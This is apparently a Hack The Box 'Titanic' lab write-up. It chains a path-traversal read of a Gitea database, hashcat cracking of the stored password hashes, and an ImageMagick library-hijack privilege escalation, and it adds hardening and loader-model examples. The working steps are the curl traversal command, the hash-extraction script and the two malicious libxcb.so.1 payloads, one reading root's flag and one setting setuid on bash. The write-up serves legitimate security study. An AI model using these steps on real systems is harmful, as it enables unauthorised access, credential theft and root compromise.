# Titanic (HTB)

## Enumeration.

### Port Scanning.

```
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 73:03:9c:76:eb:04:f1:fe:c9:e9:80:44:9c:7f:13:46 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGZG4yHYcDPrtn7U0l+ertBhGBgjIeH9vWnZcmqH0cvmCNvdcDY/ItR3tdB4yMJp0ZTth5itUVtlJJGHRYAZ8Wg=
|   256 d5:bd:1d:5e:9a:86:1c:eb:88:63:4d:5f:88:4b:7e:04 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDT1btWpkcbHWpNEEqICTtbAcQQitzOiPOmc3ZE0A69Z
80/tcp open  http    syn-ack Apache httpd 2.4.52
|_http-title: Titanic - Book Your Ship Trip
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET
|_http-favicon: Unknown favicon MD5: 79E1E0A79A613646F473CFEDA9E231F1
| http-server-header: 
|   Apache/2.4.52 (Ubuntu)
|_  Werkzeug/3.0.3 Python/3.10.12
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### Enumerate Web.

Once we open the website we see a few links and a booking form.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FAKLbOXPQkbNOidZCmdIJ%2Fimage.png?alt=media&#x26;token=ba622f27-50dc-47a1-a477-b4cf2ded5238" alt=""><figcaption></figcaption></figure>

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2Ft0NVmbcJGSz2VyDyiByN%2Fimage.png?alt=media&#x26;token=e5884428-6a87-40c1-9682-d86a5d5c87f0" alt=""><figcaption></figcaption></figure>

Once we submit the form, a JSON file containing the ticket details is downloaded to our machine.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FPWJ9vTmO3oLyRGpfoBL9%2Fimage.png?alt=media&#x26;token=4613fc8e-5810-478d-ba05-102038c8132f" alt=""><figcaption></figcaption></figure>

#### Enumerate directories.

Using dirsearch we find a few endpoints worth testing.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2F6ix3DGyspOT8qQuTgTWx%2Fimage.png?alt=media&#x26;token=752516bf-9693-43e2-ad9e-94e2b41f0e7f" alt=""><figcaption></figcaption></figure>

We see `/book`, which is clearly related to the form, and `/download`, which returns 400 (Bad Request). Let's look at it in Burp Suite.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2F1VMU3juA5P0Thdx75mf8%2Fimage.png?alt=media&#x26;token=25a57ae6-c95c-4c9a-9224-875cd0ceb24b" alt=""><figcaption></figcaption></figure>

It expects a `ticket` GET parameter, the name of the JSON file the booking form handed us.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FgfI3a1t3nIFyozpPSgWu%2Fimage.png?alt=media&#x26;token=34374d0f-53af-41de-8bc6-4f81580dd982" alt=""><figcaption></figcaption></figure>

A simple LFI: the `ticket` parameter is not restricted to the ticket directory, so path traversal with `../` reads arbitrary files. Pulling `/etc/passwd` shows a user called `developer`.
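
To make the bug class concrete, here is an added example (not the box's code, which we never get to see): a hypothetical ticket-download resolver written the vulnerable way next to a hardened version, plus the probe used above. The directory name and the `.json` file-name shape are assumptions for the example.

```python
import os
import re

# Assumed location of the generated ticket files; the box's real layout is not shown.
TICKETS_DIR = "/opt/app/tickets"

# The app hands out tickets as JSON files, so the only legitimate shape of the
# parameter is a plain file name ending in .json (an assumption for this example).
TICKET_NAME = re.compile(r"[A-Za-z0-9_-]+\.json")


def vulnerable_ticket_path(ticket: str) -> str:
    """The bug class behind /download?ticket=...: the parameter is joined straight
    onto the directory, so '..' segments walk out of it and an absolute value
    replaces the base entirely.  normpath shows what the kernel would open."""
    return os.path.normpath(os.path.join(TICKETS_DIR, ticket))


def is_safe_ticket(ticket: str) -> bool:
    """Allow-list check: no separators, no '..', only the expected shape."""
    return TICKET_NAME.fullmatch(ticket) is not None


def safe_ticket_path(ticket: str) -> str:
    """Hardened resolver: allow-list first, then canonicalise and confirm the
    result is still inside the base directory.  The second check is defence in
    depth; once the directory exists it also catches symlinks pointing out of it."""
    if not is_safe_ticket(ticket):
        raise ValueError("invalid ticket name")
    base = os.path.realpath(TICKETS_DIR)
    full = os.path.realpath(os.path.join(base, ticket))
    if os.path.commonpath([base, full]) != base:
        raise ValueError("path escapes ticket directory")
    return full


def rejects(ticket: str) -> bool:
    """True when the hardened resolver refuses the name."""
    try:
        safe_ticket_path(ticket)
    except ValueError:
        return True
    return False


def traversal_payload(target: str, depth: int = 8) -> str:
    """The probe used above: enough '../' to reach '/' from wherever the handler
    lives, then the absolute target with its leading '/' stripped."""
    return "../" * depth + target.lstrip("/")


if __name__ == "__main__":
    probe = traversal_payload("/etc/passwd")
    print("vulnerable resolves to:", vulnerable_ticket_path(probe))
    print("hardened accepts:      ", safe_ticket_path("abc123.json"))
    print("hardened rejects probe:", rejects(probe))
```

In a Flask app the same containment check is what `send_from_directory` does for you; the bug only appears when the handler builds the path by hand and passes it to `send_file` or `open`.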

## SSH as developer.

#### Gitea.

After finding the user and the LFI I tried looking for configuration files and SSH keys, but with no luck. Then, using ffuf, I was able to find this:

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FpdSXjSmFDOshF5NNR1ys%2Fimage.png?alt=media&#x26;token=ba2b3b2d-ef96-47e7-9448-51f8e710e686" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
Gitea is an open-source, self-hosted Git service that's similar to GitHub. It allows developers to manage their Git repositories on their own servers, offering features like issue tracking, pull requests, and project management in a lightweight and easy-to-set-up package.
{% endhint %}

After a bit of searching I found that Gitea keeps its SQLite database at `data/gitea/gitea.db` under its data directory, which on this box lives inside the developer's home. Let's use curl and the LFI to grab it.

```bash
curl 'http://titanic.htb/download?ticket=../../../../../../../../home/developer/gitea/data/gitea/gitea.db' --output sql
```

Once we have it we can inspect it with sqlite3.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FCGRAqj8wHBmp83YzokCW%2Fimage.png?alt=media&#x26;token=94dec2c0-d7c1-4061-a424-d18817a2d3f4" alt=""><figcaption></figcaption></figure>

Now let's try to crack these.

After a bit of searching I came across this write-up:

{% embed url="https://0xdf.gitlab.io/2024/12/14/htb-compiled.html" %}

It explains how to crack Gitea passwords. By default Gitea stores them as PBKDF2-HMAC-SHA256 with 50,000 iterations and a 50-byte output, with both the salt and the digest hex-encoded in the `user` table. hashcat handles that as mode 10900 once each row is rewritten into its `sha256:<iterations>:<base64 salt>:<base64 digest>` format.

{% tabs %}
{% tab title="Bash" %}

```bash
# Rewrite Gitea's user table into hashcat's PBKDF2-HMAC-SHA256 (mode 10900) layout:
#   name:sha256:<iterations>:<base64 salt>:<base64 digest>
# Gitea stores the salt and the 50-byte digest hex-encoded; xxd turns the hex back
# into raw bytes and base64 encodes them. 50000 is Gitea's default iteration count
# (check the passwd_hash_algo column if a row looks different). "sql" is the file
# saved by the curl above.
sqlite3 sql "select passwd,salt,name from user" | while IFS='|' read -r passwd salt name; do
    digest=$(echo "$passwd" | xxd -r -p | base64)
    salt=$(echo "$salt" | xxd -r -p | base64)
    echo "${name}:sha256:50000:${salt}:${digest}"
done | tee gitea.hashes
```

{% endtab %}
{% endtabs %}

This gives us the hashes in a format hashcat understands. Now we crack them with hashcat: mode 10900 is PBKDF2-HMAC-SHA256, and `--user` tells it each line starts with a username.

```bash
hashcat -m 10900 --user gitea.hashes ../../Downloads/rockyou.txt
```

After a bit we can see this.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FHWr9RdFLNsnswNG3oRuT%2Fimage.png?alt=media&#x26;token=ca0e6b61-deff-4f1a-8dc7-4e6755d0212d" alt=""><figcaption></figcaption></figure>

Cool, now we have valid creds. Let's SSH in.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FJ7ioEbSlJ73HSr0tojZ7%2Fimage.png?alt=media&#x26;token=b02abca1-1dfc-4b53-b0b7-4fd09d7dcc21" alt=""><figcaption></figcaption></figure>
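
The same transformation in Python, as an added example that is not part of the original write-up or of 0xdf's: it reproduces the shell one-liner above, reads the `passwd_hash_algo` column instead of assuming 50,000 iterations, and can verify a candidate password locally against a row. The sample row at the bottom is constructed (made-up salt and password, digest computed from them); it is not a hash from the box.

```python
import base64
import hashlib
import hmac
import sqlite3

# Gitea's defaults when passwd_hash_algo is just "pbkdf2" (PBKDF2-HMAC-SHA256).
DEFAULT_ITER = 50000
DEFAULT_KEYLEN = 50


def parse_algo(algo: str):
    """Parse the passwd_hash_algo column: "pbkdf2" means the defaults,
    "pbkdf2$<iterations>$<keylen>" spells them out.  Other algorithms Gitea
    supports (argon2, bcrypt, scrypt) are out of scope for hashcat mode 10900."""
    parts = algo.split("$")
    if parts[0] != "pbkdf2":
        raise ValueError(f"not a pbkdf2 row: {algo}")
    if len(parts) == 1:
        return DEFAULT_ITER, DEFAULT_KEYLEN
    if len(parts) == 3:
        return int(parts[1]), int(parts[2])
    raise ValueError(f"unexpected algo spec: {algo}")


def salt_bytes(salt: str) -> bytes:
    """Gitea tolerates two salt encodings: a legacy 10-character string used as
    raw bytes, and the current hex-encoded random salt (what xxd -r -p expects)."""
    if len(salt) == 10:
        return salt.encode()
    return bytes.fromhex(salt)


def gitea_hash(password: str, salt: str, algo: str = "pbkdf2") -> str:
    """Recompute the hex digest Gitea stores in user.passwd."""
    iters, keylen = parse_algo(algo)
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt_bytes(salt),
                               iters, dklen=keylen).hex()


def verify(password: str, passwd_hex: str, salt: str, algo: str = "pbkdf2") -> bool:
    """Check one candidate against one row (what hashcat does at scale)."""
    return hmac.compare_digest(gitea_hash(password, salt, algo), passwd_hex)


def b64(raw: bytes) -> str:
    return base64.b64encode(raw).decode()


def hashcat_line(name: str, passwd_hex: str, salt: str, algo: str = "pbkdf2") -> str:
    """Same rewrite as the shell one-liner: hex -> raw -> base64, laid out as
    name:sha256:<iterations>:<base64 salt>:<base64 digest> for mode 10900."""
    iters, _ = parse_algo(algo)
    return f"{name}:sha256:{iters}:{b64(salt_bytes(salt))}:{b64(bytes.fromhex(passwd_hex))}"


def dump_hashes(db_path: str) -> list:
    """Read every pbkdf2 row from a downloaded gitea.db (not included here)."""
    con = sqlite3.connect(db_path)
    rows = con.execute("select name, passwd, salt, passwd_hash_algo from user").fetchall()
    con.close()
    return [hashcat_line(n, p, s, a) for n, p, s, a in rows
            if a and a.split("$")[0] == "pbkdf2"]


# Constructed sample row for the example: made-up salt and password, digest
# computed from them.  Not a hash from the box.
SAMPLE_SALT = "2d149e5fbd1b20cf31db3e3c6a28fc9c"
SAMPLE_PASSWORD = "Example-Pass-123"
SAMPLE_ROW = ("sample_user", gitea_hash(SAMPLE_PASSWORD, SAMPLE_SALT), SAMPLE_SALT, "pbkdf2")


if __name__ == "__main__":
    print(hashcat_line(*SAMPLE_ROW))
    print(verify(SAMPLE_PASSWORD, SAMPLE_ROW[1], SAMPLE_SALT))
```

`dump_hashes("sql")` replaces the shell pipeline; feed its output to the same `hashcat -m 10900 --user` invocation. The legacy 10-character salt case matters because the `xxd -r -p` step in the one-liner silently mangles a non-hex salt and the resulting hash will never crack.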

## Shell as Root.

Once we're on the box as developer there are a lot of things to look at.

{% stepper %}
{% step %}

### Enumerate the docker-compose files

I enumerated the docker-compose files. One of them was interesting because it exposes SSH on port 2222; I tried planting an SSH key in /data, but with no luck.
{% endstep %}

{% step %}

### Check the website running on port 3000

I also enumerated the Gitea instance on port 3000, but there was nothing there apart from some commits about the booking system.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2Fu9r0cdi7HSXnswf6ka0T%2Fimage.png?alt=media&#x26;token=6c4c2521-74a8-4e77-8080-67f165bdc059" alt=""><figcaption></figcaption></figure>
{% endstep %}

{% step %}

### Finally, something interesting!

While checking files around the system I came across a bash script under /opt/scripts:

```bash
# Note the cd: magick runs with the images directory as its working directory.
cd /opt/app/static/assets/images
truncate -s 0 metadata.log
find /opt/app/static/assets/images/ -type f -name "*.jpg" | xargs /usr/bin/magick identify >> metadata.log
```

At first glance the script looks fine, but checking which version of `magick` is installed tells us more.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FSBrnXCclM0fdrAU8tqP8%2Fimage.png?alt=media&#x26;token=44451916-2f86-41de-a915-3e5a7079d569" alt=""><figcaption></figcaption></figure>

A quick search turns up this advisory:

{% embed url="https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-8rxc-922v-phg8" %}

The issue is in how this build of ImageMagick sets up its shared-library search path: as the advisory describes, it can end up with an empty path element, which the dynamic loader treats as the current working directory. The script above `cd`s into the images directory before calling `magick`, so a shared library placed there under the name of a library `magick` loads (here `libxcb.so.1`) gets picked up instead of the real one, and its constructor runs with the privileges of whoever runs the script, which on this box is root.

Compile this simple payload inside the images directory the script scans:

```bash
# Build a shared object named after a library magick links against. The
# constructor runs as soon as the loader maps it, before magick's own code.
gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void init(){
    system("cat /root/root.txt > /tmp/rootflag");
    exit(0);   /* stop here; the real library is never loaded */
}
EOF
```

Now wait for the script's next run. `magick` loads the library from its working directory on every run, so copying an image is not strictly required, but it is a cheap way to make sure there is a .jpg for it to process:

```bash
cp home.jpg home2.jpg
```

Then check /tmp for the flag.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FKVL0gGHrWjr25mHKsgLQ%2Fimage.png?alt=media&#x26;token=3225e092-6db0-491d-8781-6cca183400b6" alt=""><figcaption></figcaption></figure>

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FvtcBnfjTPW2bw4guWTKK%2Fimage.png?alt=media&#x26;token=daed6362-92d5-48a7-bb09-3bf56248afce" alt=""><figcaption></figcaption></figure>
{% endstep %}
{% endstepper %}
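
To show why the planted library wins, here is an added example (not from the advisory or the write-up) that models the loader's handling of LD_LIBRARY_PATH as documented in ld.so(8): entries are separated by `:` or `;`, a zero-length entry means the current working directory, and LD_LIBRARY_PATH is searched before the system directories. The AppImage mount point, the bundled file names and the system directories are made up for the example; the trailing-colon pattern is the classic way an empty entry arises (`"$APPDIR/usr/lib:$LD_LIBRARY_PATH"` with the variable unset), not a claim about the exact line in ImageMagick's wrapper.

```python
import os
import re

# ld.so(8): LD_LIBRARY_PATH entries are separated by ':' (or ';'), a zero-length
# entry means the current working directory, and glibc ignores the variable when
# it is set but completely empty.  The loader consults it before ld.so.cache and
# the default directories, and ignores it for set-user-ID programs.
SEPARATORS = re.compile(r"[:;]")

# Directories the loader falls back to after LD_LIBRARY_PATH
# (constructed for this example; the real list comes from ld.so.cache).
SYSTEM_DIRS = ["/lib/x86_64-linux-gnu", "/usr/lib/x86_64-linux-gnu"]


def search_dirs(ld_library_path: str, cwd: str) -> list:
    """Expand LD_LIBRARY_PATH the way the loader reads it: every empty entry
    becomes the working directory of the process."""
    if ld_library_path == "":
        return []
    return [cwd if entry == "" else entry for entry in SEPARATORS.split(ld_library_path)]


def cwd_entries(ld_library_path: str) -> list:
    """Indexes of the empty entries.  Any hit means the program will load
    libraries from whatever directory it happens to run in."""
    if ld_library_path == "":
        return []
    return [i for i, e in enumerate(SEPARATORS.split(ld_library_path)) if e == ""]


def which_library(ld_library_path: str, cwd: str, soname: str, present: dict):
    """First directory holding the soname wins.  `present` maps a directory to
    the file names in it (constructed here; an audit would stat the disk)."""
    for d in search_dirs(ld_library_path, cwd) + SYSTEM_DIRS:
        if soname in present.get(d, set()):
            return os.path.join(d, soname)
    return None


# Constructed scenario modelled on the box: an AppImage-style wrapper builds the
# variable as "$APPDIR/usr/lib:$LD_LIBRARY_PATH" while LD_LIBRARY_PATH is unset,
# leaving a trailing empty entry, and the script cd's into the images directory.
BUNDLED_LIB_DIR = "/tmp/.mount_magick/usr/lib"    # made-up mount point
IMAGES_DIR = "/opt/app/static/assets/images"       # from the script above
BROKEN_ENV = BUNDLED_LIB_DIR + ":"                  # trailing ':' -> empty entry
FIXED_ENV = BUNDLED_LIB_DIR                         # what the wrapper should set
DISK = {
    BUNDLED_LIB_DIR: {"libMagickCore.so"},          # bundled libs (names made up)
    IMAGES_DIR: {"home.jpg", "libxcb.so.1"},        # the planted library
    "/lib/x86_64-linux-gnu": {"libxcb.so.1"},       # the genuine system copy
}


def loaded_libxcb(env: str):
    """Which libxcb.so.1 magick would map under the given LD_LIBRARY_PATH."""
    return which_library(env, IMAGES_DIR, "libxcb.so.1", DISK)


def audit_environment() -> list:
    """Check the current process: the empty entries in its LD_LIBRARY_PATH, if any."""
    value = os.environ.get("LD_LIBRARY_PATH")
    return [] if value is None else cwd_entries(value)


if __name__ == "__main__":
    print("broken wrapper loads:", loaded_libxcb(BROKEN_ENV))
    print("fixed wrapper loads: ", loaded_libxcb(FIXED_ENV))
    print("empty entries here:  ", audit_environment())
```

Two practical consequences follow from the model. Because LD_LIBRARY_PATH is ignored for set-user-ID binaries, this kind of injection only works when a privileged user runs a normal binary, as root's script does here; and the `cd` in the script is what puts the writable images directory in reach, so a wrapper that never introduces an empty entry (the fixed variable above) loads the system copy regardless of where it runs.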

## Additional info.

For the sake of curiosity I wanted an actual root shell, not just the flag. That is easy: we only need a way to run a shell as root.

We can set the setuid bit on the bash binary. It is owned by root, so anyone who executes it then runs it with root's effective uid.

Here is the updated payload:

```bash
gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void init(){
    /* 4755 would be enough; 4777 also makes bash world-writable, which is
       unnecessary and risky on a shared box. */
    system("chmod 4777 /usr/bin/bash");
    exit(0);
}
EOF
```

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2F9UBbEn2JTznJMOdP1JTF%2Fimage.png?alt=media&#x26;token=b17f45bd-bd6f-472b-b5df-c2217adee663" alt=""><figcaption></figcaption></figure>

But be careful: running `bash` as-is will not give you a root shell.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FRBrBNXlsvV3Rt8VTbDMR%2Fimage.png?alt=media&#x26;token=780ca956-924a-4e57-a9ab-a9c7edd351a5" alt=""><figcaption></figcaption></figure>

As we can see we are still not root. This is not the kernel's doing (it did set our effective uid to 0 when the setuid binary started); it is bash itself: when it starts with an effective uid that differs from the real uid and is not given `-p`, it resets the effective uid back to the real one. Running `bash -p` keeps the elevated effective uid.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FwnLEi9I3Pfeew6hrmo4h%2Fimage.png?alt=media&#x26;token=605f545b-fba4-4899-ba61-1efc44716fdd" alt=""><figcaption></figcaption></figure>
